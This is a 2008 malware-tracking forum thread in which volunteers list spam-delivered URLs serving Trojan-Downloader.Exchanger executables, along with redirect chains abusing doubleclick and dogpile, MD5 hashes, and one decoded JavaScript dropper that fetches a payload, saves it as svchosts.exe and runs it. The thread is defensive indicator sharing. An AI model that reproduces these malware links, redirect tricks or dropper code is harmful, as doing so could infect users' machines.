Malware Domain List

Malware Related => Malicious Domains => Topic started by: bobby on May 28, 2008, 01:24:50 pm

Title: Thread about Exchanger sites
Post by: bobby on May 28, 2008, 01:24:50 pm
I'll post here the links to sites infected with Trojan-Downloader.Exchanger.xx

I get the links from spam emails. All of the mails are about some video (Britney caught naked etc.)

Code: [Select]
http://thebrits.cl/index.php
>
http://thebrits.cl/pindex.php  < a script, see bellow
http://thebrits.cl/wamkl.gif
http://thebrits.cl/video_new.exe

http://thebrits.cl/pindex.php
>
http://thebrits.cl//load.php   < exe file
Title: Re: Thread about Exchanger sites
Post by: JohnC on May 28, 2008, 06:30:26 pm
Thank you.
Title: Re: Thread about Exchanger sites
Post by: bobby on May 28, 2008, 08:42:42 pm
The list of previous Exchanger URLs (recovered from Malzilla's cache):
Code: [Select]
http://www.b-created.be/images/xyt/video_free.exe
http://logistixmedia.com/images/video/video_int.exe
http://rockaina.com/video.exe
http://justleopold.com/video.exe
http://remotes.ch/video.exe
http://www.ufg.asso.fr/video.exe
http://normrestorasyon.com/video.exe
http://www.sural-autoparts.com/video.exe
http://www.bambinidimanina.org/video.exe
http://iberseas.com/video.exe
http://mitoltd.com.tr/video.exe
http://studiogsm.pl/video.exe
http://flet.za.pl/video.exe
http://www.vallejo.onored.com/video.exe
http://www.photokeepsake.co.uk/video.exe
http://abakos.com.es/video.exe
http://simon.lermen.de/video.exe
http://tellover.com/video.exe
http://jungschar-stthekla.at/video.exe
http://beaukaye.com/video.exe
Probably all of them are dead by now.
Title: Re: Thread about Exchanger sites
Post by: JohnC on May 28, 2008, 11:59:44 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on May 29, 2008, 01:13:21 pm
Code: [Select]
http://www.cronicasdecaracas.com/for_y.php
> http://www.cronicasdecaracas.com/main34.html
>>http://www.cronicasdecaracas.com/pindex.php
>>http://www.cronicasdecaracas.com/untitled.gif
>>http://www.cronicasdecaracas.com/for_you.exe

http://www.cronicasdecaracas.com/pindex.php  <-- fake 404 with JS
>http://www.cronicasdecaracas.com//load.php  <-- payload, exe file

Decoded script:

poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','cl');
var asst = ender.CreateObject('adT','http://www.cronicasdecaracas.com//load.php',false);
asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}}
Title: Re: Thread about Exchanger sites
Post by: bobby on May 29, 2008, 08:19:36 pm
Code: [Select]
http://expotech.es/video.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on May 29, 2008, 10:29:38 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on May 30, 2008, 12:55:09 pm
New one.
Code: [Select]
http://ad.doubleclick.net/click;h=nfuit;~sscs=%3fhttp://bottegadelpesto.com/video.exe
This time I gave the link in the form it was in spam mail.
Earlier links in this thread also contained redirections, but through Google.
This one uses new redirection - through doubleclick.net
Title: Re: Thread about Exchanger sites
Post by: JohnC on May 30, 2008, 06:17:58 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on May 31, 2008, 06:49:16 am
Code: [Select]
http://do-haguenau.com/index1.php
>http://do-haguenau.com/main34.html
>>http://do-haguenau.com/pindex.php  <<-- fake 404, JavaScript
>>http://do-haguenau.com/wamkl.gif
>>http://do-haguenau.com/video_film.exe  <<-- payload

http://do-haguenau.com/pindex.php
>http://do-haguenau.com//load.php  <<-- payload

Same scheme like in one from the previous cases
Title: Re: Thread about Exchanger sites
Post by: bobby on May 31, 2008, 08:31:28 am
Code: [Select]
http://www.quinotizie.info/video.exeDoubleclick.net redirection used
Code: [Select]
http://ad.doubleclick.net/click;h=IKgZj;~sscs=%3fhttp://www.quinotizie.info/video.exe
Title: Re: Thread about Exchanger sites
Post by: bobby on May 31, 2008, 12:12:01 pm
Code: [Select]
http://www.blumedit.it/video.exeDoubleclick.net redirection is used in spammed link:
Code: [Select]
http://ad.doubleclick.net/click;h=SLrjj;~sscs=%3fhttp://www.blumedit.it/video.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on May 31, 2008, 07:39:54 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 01, 2008, 02:17:18 pm
Code: [Select]
http://clubnauticoliva.com/video.exeIt was using redirection through Doubleclick.net
Code: [Select]
http://ad.doubleclick.net/click;h=FMKqg;~sscs=%3fhttp://clubnauticoliva.com/video.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 01, 2008, 09:37:07 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 02, 2008, 07:37:35 pm
Code: [Select]
http://agdarbud.pl/index7.php
>http://agdarbud.pl/main34.html
>>http://agdarbud.pl/pindex.php  <<-- fake 404, JavaScript
>>http://agdarbud.pl/wamkl.gif
>>http://agdarbud.pl/porno_new.exe  <<-- payload

http://agdarbud.pl/pindex.php
>http://agdarbud.pl//load.php  <<-- payload
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 02, 2008, 09:40:53 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 05, 2008, 08:44:19 pm
Code: [Select]
http://hokejforum.sk/index3.php
>>http://hokejforum.sk/arch.exe
>>http://hokejforum.sk//load.php

Same scheme like the previous one. I gave here just the spammed link, and the exe files.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 06, 2008, 09:07:36 am
Code: [Select]
http://impresalavoro.it/video.exe
http://impresalavoro.it/video1.exe
Doubleclick redirection used in mail, but it is not working if you click it over doubleclick.
If you try the links in the form I gave here (direct) - it will download the files.
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 06, 2008, 05:08:35 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 07, 2008, 10:44:54 am
Code: [Select]
http://worldchinesewriters.com/index1.php
>http://worldchinesewriters.com/free_vid.exe
>http://worldchinesewriters.com/load.php
Title: Re: Thread about Exchanger sites
Post by: bobby on June 08, 2008, 02:29:35 pm
Code: [Select]
http://glamsmile.fr/index1.php
>http://glamsmile.fr/lite_porno.exe
>http://glamsmile.fr/load.php
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 08, 2008, 08:21:40 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 09, 2008, 04:26:08 pm
Code: [Select]
http://morethir.at/index1.php
>http://morethir.at/new_mpg.exe
>http://morethir.at/load.php


New redirector, old malware site:
Code: [Select]
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://impresalavoro.it/video1.exe&0=&1=0&4=244.732.085.037&5=912.605.906.658&9=3959244732085&1
Title: Re: Thread about Exchanger sites
Post by: bobby on June 09, 2008, 06:56:34 pm
From here: http://www.malwaredomainlist.com/forums/index.php?topic=1765.msg3517#msg3517
Code: [Select]
http://durantiluminacao.com.br/index.php
>http://durantiluminacao.com.br/shok_video.exe
>http://durantiluminacao.com.br/load.php

Code: [Select]
http://karate-passirano.it/video1.exe
http://karate-passirano.it/video.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 09, 2008, 07:39:44 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 10, 2008, 07:10:06 pm
Code: [Select]
http://www.dinekeluring.nl/index.php
>http://www.dinekeluring.nl/free_vid.exe
>http://www.dinekeluring.nl/load.php
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 10, 2008, 08:48:53 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 18, 2008, 06:53:18 pm
Code: [Select]
http://www.wmrt2008.org/video1.exe
http://www.wmrt2008.org/video.exe
Original spam link with redirection:
Code: [Select]
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://www.wmrt2008.org/video1.exe&0=&1=0&4=915.796.210.076&5=805.573.728.746&9=5004915796210&1
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 18, 2008, 07:31:31 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 19, 2008, 08:05:05 pm
Code: [Select]
http://emes.com.br/index.php
http://www.saleperfum.com/video.exe
http://customcars.com.br/index1.php
http://ratedhot.cn/
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 19, 2008, 08:33:23 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 22, 2008, 10:40:07 am
Code: [Select]
http://espana.gob.ve/video1.exe
http://espana.gob.ve/video.exe
Title: Re: Thread about Exchanger sites
Post by: bobby on June 22, 2008, 08:10:34 pm
Code: [Select]
http://max-graf.com.pl/video.exe
http://max-graf.com.pl/video1.exe

Raw
Code: [Select]
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://max-graf.com.pl/video1.exe&0=&1=0&4=679.806.026.373&5=382.518.608.089&9=5718679806026&1
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 22, 2008, 10:05:47 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 23, 2008, 03:22:47 am
Code: [Select]
http://soltonatiuh.com/video.exe
http://soltonatiuh.com/video1.exe
Title: Re: Thread about Exchanger sites
Post by: bobby on June 25, 2008, 05:27:16 pm
Raw link:
Code: [Select]
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://alarahomes.com/video1.exe&0=&1=0&4=193.358.696.010&5=809.953.588.168&9=5048193358696&1Payloads:
Code: [Select]
http://alarahomes.com/video.exe
http://alarahomes.com/video1.exe



Code: [Select]
http://prensaarabe.com/video.exe
http://prensaarabe.com/video1.exe

This one is good
"I noticed that you have visited illegal websites."
Code: [Select]
http://www.slowinscy.pl/index1.phpPayload seems not to be present on the server, file is missing.
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 25, 2008, 08:15:47 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 27, 2008, 06:53:22 am
RAW
Code: [Select]
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://web451.prx-lamp-011.de/video1.exe&0=&1=0&4=901.809.397.981&5=288.743.708.824&9=1675901809397&1
Code: [Select]
http://web451.prx-lamp-011.de/video1.exe
http://web451.prx-lamp-011.de/video.exe


Code: [Select]
http://www.saldescatalunya.org/index1.php
>http://saldescatalunya.org/xxx_video.exe
>http://saldescatalunya.org/load.php
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 27, 2008, 08:45:01 pm
Thank you.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 28, 2008, 09:06:25 pm
Code: [Select]
http://www.franjerplast.it/video.exe
http://www.franjerplast.it/video1.exe

RAW link from spam mail
Code: [Select]
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://www.franjerplast.it/video1.exe&0=&1=0&4=317.948.281.162&5=935.551.428.491&9=4235317948281&1

Code: [Select]
http://www.nordicfoto.eu/index1.php
>http://nordicfoto.eu/hot_video.exe
>http://nordicfoto.eu/pindex.php
>>http://nordicfoto.eu/load.php
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 28, 2008, 09:19:57 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on June 29, 2008, 11:07:51 am
Code: [Select]
http://leria.pl/video.exe
http://leria.pl/video1.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on June 29, 2008, 08:42:55 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on July 04, 2008, 03:31:52 pm
Code: [Select]
http://www.lojatribus.com.br/video.exe
http://t-consulting.it/video.exe
http://acr-dealer.acr-dealer.bplaced.net/video1.exe
http://www.stamp-go.com/video1.exe
http://themdopinion.com/video1.exe
http://prensaarabe.com/video1.exe
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://elasterisco.com/video1.exe&0=&1=0&4=496.479.508.232&5=458.902.391.040&9=9205496479508&1
Title: Re: Thread about Exchanger sites
Post by: JohnC on July 04, 2008, 10:29:12 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on July 06, 2008, 06:22:31 pm
Code: [Select]
http://www.daihen-otc.com/video.exe
http://stolman.stolman.nazwa.pl/video.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on July 08, 2008, 06:12:53 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: sursmurf on July 10, 2008, 07:17:25 pm
Code: [Select]
http://dfs-service.com/index1.php
http://doenervich.rapidspace.de/index1.php
Title: Re: Thread about Exchanger sites
Post by: sursmurf on July 10, 2008, 08:04:53 pm
Code: [Select]
http://www.khmermedias.com/index1.php
Title: Re: Thread about Exchanger sites
Post by: JohnC on July 11, 2008, 10:21:56 pm
Thank you.
Title: Re: Thread about Exchanger sites
Post by: sursmurf on July 12, 2008, 08:45:10 am
Code: [Select]
http://herbalizando.com/index6.html
http://dianimamusic.com/index1.php
Title: Re: Thread about Exchanger sites
Post by: sursmurf on July 12, 2008, 03:13:44 pm
Code: [Select]
http://barcodecolegas.es/index1.php
http://xoopsitalia.org/index1.php
Title: Re: Thread about Exchanger sites
Post by: sursmurf on July 13, 2008, 09:39:46 am
Code: [Select]
http://www.ambjente.it/index1.php
http://asterbit.com/index1.php
Title: Re: Thread about Exchanger sites
Post by: sursmurf on July 13, 2008, 12:42:54 pm
Code: [Select]
http://www.audaf.com.uy/index1.php
http://99km.org/index1.php
Title: Re: Thread about Exchanger sites
Post by: sursmurf on July 13, 2008, 05:27:52 pm
Code: [Select]
http://catotech.de/index1.php
http://chatblackknights.altervista.org/index1.php
Title: Re: Thread about Exchanger sites
Post by: JohnC on July 15, 2008, 03:38:29 pm
Thank you.
Title: Re: Thread about Exchanger sites
Post by: sowhat-x on July 19, 2008, 03:14:33 pm
VirusTotal said 'Pakes / Tibs / Exchanger.Gen',thereby...

Quote
hxxp://rennsteighaus.de/msvideoc.exe
hxxp://cursointensivocardio.com.br/msvideoc.exe
hxxp://personales.ya.com/q1w2/postcard.exe
Title: Re: Thread about Exchanger sites
Post by: sowhat-x on July 19, 2008, 03:28:04 pm
Plus one more...  ;)
Quote
hxxp://unreal.co.il/msvideoc.exe
Title: Re: Thread about Exchanger sites
Post by: philipp on July 19, 2008, 03:33:56 pm
Code: [Select]
http://ttevolution.com/msvideoc.exe
md5: 2a354a3f5ccab70da496c07c288b11ad
Title: Re: Thread about Exchanger sites
Post by: JohnC on July 20, 2008, 12:49:27 pm
Thank you.
Title: Re: Thread about Exchanger sites
Post by: philipp on July 20, 2008, 12:55:00 pm
Code: [Select]
http://ben.bl-djz.com/msvideoc.exe
http://saburriemurri.com/msvideoc.exe
http://lightsystemsrl.it/msvideoc.exe
http://www.amuletti.es/msvideoc.exe
Title: Re: Thread about Exchanger sites
Post by: sowhat-x on July 21, 2008, 01:45:30 pm
Quote
hxxp://estudiborrell.com/watch.exe
hxxp://www.cvcsvit.edu.sk/msvideoc.exe
hxxp://www.kayscookery.com/msvideoc.exe

Quote
hxxp://www.fotoskola.lv/msvideoc.exe
hxxp://66.199.240.138/ldrctl/ldrctl.php

Quote
hxxp://pinotoma.com/msvideoc.exe
Title: Re: Thread about Exchanger sites
Post by: philipp on July 22, 2008, 11:50:17 am
Code: [Select]
http://zoomarket.net/msvideoc.exe
Title: Re: Thread about Exchanger sites
Post by: sowhat-x on July 22, 2008, 12:36:39 pm
Quote
hxxp://www.lauscher-staat.de/msvideoc.exe
hxxp://www.onlinemallorca.de/msvideoc.exe
hxxp://salon-hüsemann.de/msvideoc.exe
Title: Re: Thread about Exchanger sites
Post by: bobby on July 26, 2008, 08:54:46 am
Code: [Select]
http://svcanvas.com/topnews.html
http://grtprograms.com/watchit.html
http://70.198.172.221/
http://condorautocenter.com.br/watchit.html
http://www.ripplundrippl.de/watchit.html
http://newyork-hebergement.com/watchit.html
http://www.bmfactory.com/index1.php
http://tartuinstituut.ca/watchit.html
http://restaurantelucero.com/index1.php
http://i-dos.es/index1.php
Title: Re: Thread about Exchanger sites
Post by: JohnC on July 26, 2008, 09:01:49 pm
Thanks.
Title: Re: Thread about Exchanger sites
Post by: bobby on July 27, 2008, 05:40:58 pm
Code: [Select]
http://www.gtsmbh.net/live.html
http://t.pl/index1.php
http://thewindsorhotel.it/hotnews.html
http://150.135.17.25/
http://alonmak.com/index1.php
http://72031.webhosting15.1blu.de/index1.php
Title: Re: Thread about Exchanger sites
Post by: bobby on July 28, 2008, 06:09:25 pm
Code: [Select]
http://rampichino.eu/fresh.html
http://www.zimmermann-ockenheim.de/fresh.html
http://essentialenergies.com.au/images/thumbs/video-nude-anjelia.avi.exe
http://risasnc.it/fresh.html
http://logisigns.net/fresh.html
http://www.easterstreet.de/fresh.html
http://osniehus.de/fresh.html
http://a2.kurumsalkimlik.biz/index1.php
Title: Re: Thread about Exchanger sites
Post by: bobby on July 28, 2008, 06:59:46 pm
Code: [Select]
http://208.112.7.68/checkit.html
http://ghioautotre.it/flash.exe
Title: Re: Thread about Exchanger sites
Post by: sowhat-x on July 30, 2008, 01:36:23 pm
MD5 -> A7E316A7EBC0A90F1D278D63F500E79F
Quote
hxxp://farskarshenas.org/images/video-nude-anjelia.avi.exe
hxxp://functionaleating.com/root1/images/erotic/video-nude-anjelia.avi.exe
hxxp://fyzikskool.com/agp/video-nude-anjelia.avi.exe
hxxp://metroquimica.com.ar/img/_notes/video-nude-anjelia.avi.exe
hxxp://mjme-solutions.com/MCP/MCP/video-nude-anjelia.avi.exe
hxxp://nuevepuntoecehegin.iespana.es/images/video-nude-anjelia.avi.exe
hxxp://regard.com.br/intro/video-nude-anjelia.avi.exe
hxxp://sedmikraska.wz.cz/images/_vti_cnf/video-nude-anjelia.avi.exe
hxxp://www.pmba12322.pwp.blueyonder.co.uk/video-nude-anjelia.avi.exe
hxxp://www.sentmenatbici.com/Imagenes/PNG/video-nude-anjelia.avi.exe

MD5 -> 45EA995D311547BD7559F1F84999D7B5
Quote
hxxp://denizlisurucukursu.com.tr/images/img/video-anjelina.avi.exe

MD5 -> 14141399CF426341181B9BE1A2A60B98
Quote
hxxp://joseantoniobaltanas.com/flash.exe
hxxp://www.yesilderekoyu.com/flash.exe
Title: Re: Thread about Exchanger sites
Post by: bobby on July 30, 2008, 03:47:15 pm
Code: [Select]
http://ghioautotre.it/live.html
http://www.retder.com/checkit.html
http://www.gbv-welper.de/checkit.html
http://alipertimolas.com.br/index1.php
http://locke1.gmxhome.de/flash.exe
http://warinsa.com/default.html
http://www.yesilderekoyu.com/flash.exe
http://www.surfdiscount.de/flash.exe
http://ankaraspor.com.tr/default.html
http://www.sarahrunge.de/default.html
http://cit-inc.net/default.html
http://www.aovivonanet.com/index1.php
http://ferien-urlaub-lastminute.de/default.html
http://navitel.pl/default.html
http://www.spielbogen.ch/default.html
http://cresapartnersmiami.com/default.html
Title: Re: Thread about Exchanger sites
Post by: sowhat-x on July 31, 2008, 01:43:36 pm
Quote
hxxp://esthelita.iespana.es/menu_archivos/video/video-anjelina.avi.exe
hxxp://RUBEN-LAND.iespana.es/images/_vti_cnf/video-anjelina.avi.exe
hxxp://www.bocosmetic.com/SITO%20COMPLETO/images/video-anjelina.avi.exe
hxxp://www.cobcoe.org.uk/images/menu/video-nude-anjelia.avi.exe
hxxp://www.eleusis.tv/flash.exe
hxxp://www.tudici.org/flash.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on August 02, 2008, 06:14:14 pm
Thanks.
Title: Malicious Spam
Post by: Evilcry on August 11, 2008, 12:59:23 pm
Hi,

Directly from the new trend of spam.. today I've received a Spam that contains the following
malicious link:

Code: [Select]
http://robbiereel.com/index1.php

that redirects to:

Code: [Select]
http://robbiereel.com/index12.html

and finally to:

Code: [Select]
http://robbiereel.com/video3425gdf3.exe

video3425gdf3.exe is Trojan-Downloader.Win32.Agent.aacg


Title: Re: Thread about Exchanger sites
Post by: sursmurf on August 11, 2008, 02:44:20 pm
Code: [Select]
http://moje-php.xf.cz/cnnvid.html
http://rihaweb.wz.cz/cnnvid.html
http://www.pappschik.de/cnnvid.html
http://acrpolska.pl/cnnvid.html
http://tonysproductreviews.com/cnnvid.html
http://joscarorganics.co.uk/cnnvid.html

they all end up downloading adobe_flash.exe


http://www.virustotal.com/analisis/e243b5b6a0c77c8f25f0e9f193163b5f
Title: Re: Thread about Exchanger sites
Post by: philipp on August 12, 2008, 11:13:49 am
Code: [Select]
http://stageeventos.com.br/_images/video-nude-anjelia.avi.exe
http://artmx.com.br/imagens/imagens_content/video-anjelina.avi.exe
http://196.32.220.3/video-nude-anjelina.avi.exe
http://www.orca.com.tr/images/paris-nude-video.avi.exe
http://kam3-l3on.ifrance.com/phpBB2/images/smiles/video-nude-anjelia.avi.exe
http://stoppatologii.za.pl/imagenes/.../video-anjelina.avi.exe
http://toleventours.iespana.es/images/Paris-nude-video.avi.exe
http://www.shsoluzioni.it/images/Paris-nude-video.avi.exe
http://lipt0n.freehost.pl/images/Paris-nude-video.avi.exe
http://www.frankiemunozmanagement.com/videos/Paris-nude-video.avi.exe
Title: Re: Thread about Exchanger sites
Post by: sursmurf on August 16, 2008, 08:22:53 pm
Code: [Select]
http://62.129.131.197/install.exe
http://acrpolska.pl/install.exe
http://dominostalkforums.org/install.exe
http://frmkaynak.com/install.exe
http://efmpentathlon.org/install.exe
http://www.matbroome.com/install.exe

http://mgmvalet.com/index1.php
http://havermexicana.com.mx/index1.php

Title: Re: Thread about Exchanger sites
Post by: JohnC on August 18, 2008, 05:09:24 pm
Thank you.
Title: Re: Thread about Exchanger sites
Post by: blender on August 21, 2008, 08:39:38 am
http://www.saulogomes.com.br/msvid32.exe <-- exchanger

Droppings:

79.135.167.18/20scan1.exe
79.135.167.18/21scan.exe
79.135.167.18/ftpgd.exe
avxp-2008.net/images/1219303511/ee92fb91e4e687490ecb8c7404afbdba/8efbe1be-570d-4b91-80d8-f535d5b47182.gif

Ends up installing XPAntivirus, FakeAlert/Renos with the fake BSOD screensaver & hijacked desktop pic/restrictions, Infostealer.
Title: Re: Thread about Exchanger sites
Post by: CM_MWR on August 21, 2008, 09:30:16 am
Careful dragging those binaries outa vm now.  :-*
Title: Re: Thread about Exchanger sites
Post by: blender on August 21, 2008, 09:32:35 am
:P

Wouldn't be my 1st format!
Title: Re: Thread about Exchanger sites
Post by: CM_MWR on August 21, 2008, 09:34:10 am
lol@fufi!

This avp2008 and bravix installers are everywhere.  >:(
Title: Re: Thread about Exchanger sites
Post by: blender on August 21, 2008, 05:56:31 pm
FUFI! is Fun!

few more exchangers.
No clue if still live atm.

Code: [Select]
http://fmsudamericana.com/index_1.html
http://gerp.com.br/homme/homme.php
http://nsoares.eu1net.org/index1.php
http://pension-aupoil.fr/index1.php
http://pop40.com.br/index_1.html
http://roboto.com.ar/index1.php
http://semneartemis.ro/index_1.html
http://studio.metouia.net/index1.php
http://thegreencrusade.com/index1.php
http://upac.com.au/index_1.html
http://www.blue-monday.org/index_1.html
http://www.hotelshelton.com.br/homme/homme.php

http://68.178.197.15/msvid32.exe
http://89.187.49.18/madonna.avi.exe
http://aventurastour.com/play.exe
http://burons.cantalpassion.com/play.exe
http://christosgroup.com/msvid32.exe
http://commune-siran.cantalpassion.com/play.exe
http://construtoraleal.com.br/play.exe
http://crosmedia.ro/play.exe
http://fmsudamericana.com/codecpack.exe
http://incibaharat.com/msvid32.exe
http://iou.org/msvid32.exe
http://itarareonline.com/msvid32.exe
http://multiphonie.cantalpassion.com/play.exe
http://www.barryhutchison.com/msvid32.exe
http://www.black10.home.pl/play.exe
http://www.calfsoft.com/play.exe
http://www.capembalagens.com.br/msvid32.exe
http://www.dcd-trade.ch/play.exe
http://www.fmpasion.com.ar/msvid32.exe
http://www.g4god.in/play.exe
http://www.gkv.in/play.exe
http://www.noticiasmisioneras.com/msvid32.exe
http://www.ribeiraopretoeregiao.com.br/msvid32.exe
http://www.traquejo.com.br/msvid32.exe
Title: Re: Thread about Exchanger sites
Post by: blender on August 21, 2008, 08:24:14 pm
Sommore:

hxxp://1000millasargentina.com.ar/play.exe
hxxp://3kman.com.ar/play.exe
hxxp://89.187.49.18/madonna.avi.exe
hxxp://89.187.49.18/setup.exe
hxxp://acrediteofilme.com.br/play.exe
hxxp://agmerparana.com.ar/play.exe
hxxp://aicsolucoes.com/play.exe
hxxp://angelina.cantalpassion.com/play.exe
hxxp://aventurastour.com/play.exe
hxxp://bandaantidoto.com/play.exe
hxxp://bcm.org.my/play.exe
hxxp://beta.theindustryresource.com/play.exe
hxxp://burons.cantalpassion.com/play.exe
hxxp://cantal-arts.cantalpassion.com/play.exe
hxxp://cantalcheval.cantalpassion.com/play.exe
hxxp://cesium-chloride.com/play.exe
hxxp://commune-siran.cantalpassion.com/play.exe
hxxp://construtoraleal.com.br/play.exe
hxxp://conveying.com/play.exe
hxxp://coulon.cantalpassion.com/play.exe
hxxp://crosmedia.ro/play.exe
hxxp://cyberstart.com.ar/msvid32.exe
hxxp://deathbyrose.hanagasumi.net/play.exe
hxxp://edr.co.in/play.exe
hxxp://elexor.com/play.exe
hxxp://elportal.info/play.exe
hxxp://evergreen-studio.com/play.exe
hxxp://exectr.net/index.php
hxxp://exectr.net/privacy-policy.php
hxxp://fakecrucifixion.kurushiunai.jp/play.exe
hxxp://fencefactory.com.au/play.exe
hxxp://fetraelec.com.ve/play.exe
hxxp://fouracesstags.com/msvid32.exe
hxxp://francarros.com.br/play.exe
hxxp://freddygarcia.com.ve/play.exe
hxxp://ftp-fr.eservglobal.com/play.exe
hxxp://garbati.com.uy/play.exe
hxxp://gdbdev.com/play.exe
hxxp://gfportfolio.com.ar/play.exe
hxxp://gite.seccaud.albepierre.cantalpassion.com/play.exe
hxxp://glycerine.servebeer.com/play.exe
hxxp://handofset.com/play.exe
hxxp://ieo15.cantalpassion.com/play.exe
hxxp://intranetcivica.com.ar/play.exe
hxxp://jet-multimedia.de/play.exe
hxxp://jordannefm.cantalpassion.com/play.exe
hxxp://jotna.com/play.exe
hxxp://lpo.cantal.cantalpassion.com/play.exe
hxxp://madurezcero.com/play.exe
hxxp://marketah.mysteria.cz/play.exe
hxxp://meyers.com/play.exe
hxxp://multiphonie.cantalpassion.com/play.exe
hxxp://ostal.del.libre.cantalpassion.com/play.exe
hxxp://ostaloisa.cantalpassion.com/play.exe
hxxp://portaldoctordj.com/play.exe
hxxp://roskiman.com/play.exe
hxxp://rugby.arpajon15.cantalpassion.com/play.exe
hxxp://rugby.cantalpassion.com/play.exe
hxxp://sadsystems.com.ar.elserver.com/play.exe
hxxp://scoutik.mysteria.cz/play.exe
hxxp://septfons.cantalpassion.com/play.exe
hxxp://shopathomecafe.com/play.exe
hxxp://tagsag.bringapont.hu/play.exe
hxxp://thomasregisterofnj.com/play.exe
hxxp://tirtaji.com/play.exe
hxxp://toaqsa.com/play.exe
hxxp://tokotor.cg.yu/play.exe
hxxp://tolhuin.gov.ar/play.exe
hxxp://voceacontece.com/play.exe
hxxp://wiki.cantalpassion.com/play.exe
hxxp://www.arminseemann.ch/play.exe
hxxp://www.bajajinternational.com/play.exe
hxxp://www.black10.home.pl/play.exe
hxxp://www.bodegasadan.com/play.exe
hxxp://www.bwlapdance.com/play.exe
hxxp://www.calfsoft.com/play.exe
hxxp://www.dcd-trade.ch/play.exe
hxxp://www.divesociety.ch/play.exe
hxxp://www.emrbpo.com/play.exe
hxxp://www.fencefactory.com.au/play.exe
hxxp://www.fridayfilmworks.com/play.exe
hxxp://www.g4god.in/play.exe
hxxp://www.gkv.in/play.exe
hxxp://www.grutly.com/play.exe
hxxp://www.lenapiel.com/play.exe
hxxp://www.pcperfect.ch/play.exe
hxxp://www.professionalinweb.in/play.exe
hxxp://www.programasergiorocha.com/msvid32.exe
hxxp://www.punniya.com.sg/play.exe
hxxp://www.sail-on.cn/play.exe
hxxp://www.technohub.co.th/play.exe
hxxp://www.thejonwebgroup.com/play.exe
hxxp://www.valuespace.de/play.exe
hxxp://yvon.momboisse.cantalpassion.com/play.exe

Dunno whats live or dead. -- didnt check.
Didn't check for dupes either
Title: Re: Thread about Exchanger sites
Post by: pcaccent on August 22, 2008, 12:36:47 am
Quote
hxxp://7yascokgec.com/player.exe
hxxp://1000millasargentina.com.ar/player.exe
hxxp://agmerparana.com.ar/player.exe
hxxp://www.black10.home.pl/player.exe
hxxp://evergreen-studio.com/player.exe
hxxp://fencefactory.com.au/player.exe
hxxp://www.fridayfilmworks.com/player.exe
hxxp://www.g4god.in/player.exe
hxxp://fakecrucifixion.kurushiunai.jp/player.exe
hxxp://meyers.com/player.exe
hxxp://tirtaji.com/player.exe
hxxp://www.valuespace.de/player.exe
Title: Re: Thread about Exchanger sites
Post by: JohnC on August 24, 2008, 09:57:31 pm
Thank you.